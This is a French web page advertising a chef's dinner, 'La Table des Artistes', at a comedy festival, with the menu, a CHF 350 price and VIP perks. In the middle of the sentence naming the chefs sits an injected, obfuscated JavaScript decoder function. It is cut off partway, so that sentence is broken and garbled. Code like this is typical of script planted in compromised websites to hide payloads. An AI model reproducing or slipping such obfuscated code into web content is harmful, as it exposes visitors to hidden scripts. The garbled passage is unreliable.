La Table des Artistes

Durant le Festival, les brigades de Julien Texier et Jérémie Ollivier (function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand.ch/restaurant-champery/” target=”_blank” rel=”noopener”>Atelier Gourmand, 15/20 au Gault & Millau) et d'Alain Gex-Collet (chez Coquoz) vous accueilleront au coeur de l'événement dans notre restaurant des artistes où vous pourrez profiter d'un menu gastronomique avant le spectacle.

Le Chef vous propose

Caramel de Foie Gras
Truite confite au sel, émulsion citron
*****
Féra du lac brûlée puis marinée à l'huile d'olive
Tartare d'asperges du Valais
*****
Filet de veau cuit à basse température
Jus corsé, velouté ail des ours. déclinaison de carottes
*****
Tartelette au fraises édition #MRF18

menu sous réserve de modification
  • CHF 350.- par personne (boissons comprises)
  • Réservation minimum 6 personnes
  • Coupe de Champagne, vins, minérales et cafés inclus
  • Parking VIP et places réservées dans la salle
  • Accès à l'Espace VIP à l'issue du spectacle
  • Attention places limitées (maximum 36 personnes)

plus d'informations
latable@maxi-rires.ch

la table des artistes vous est proposée par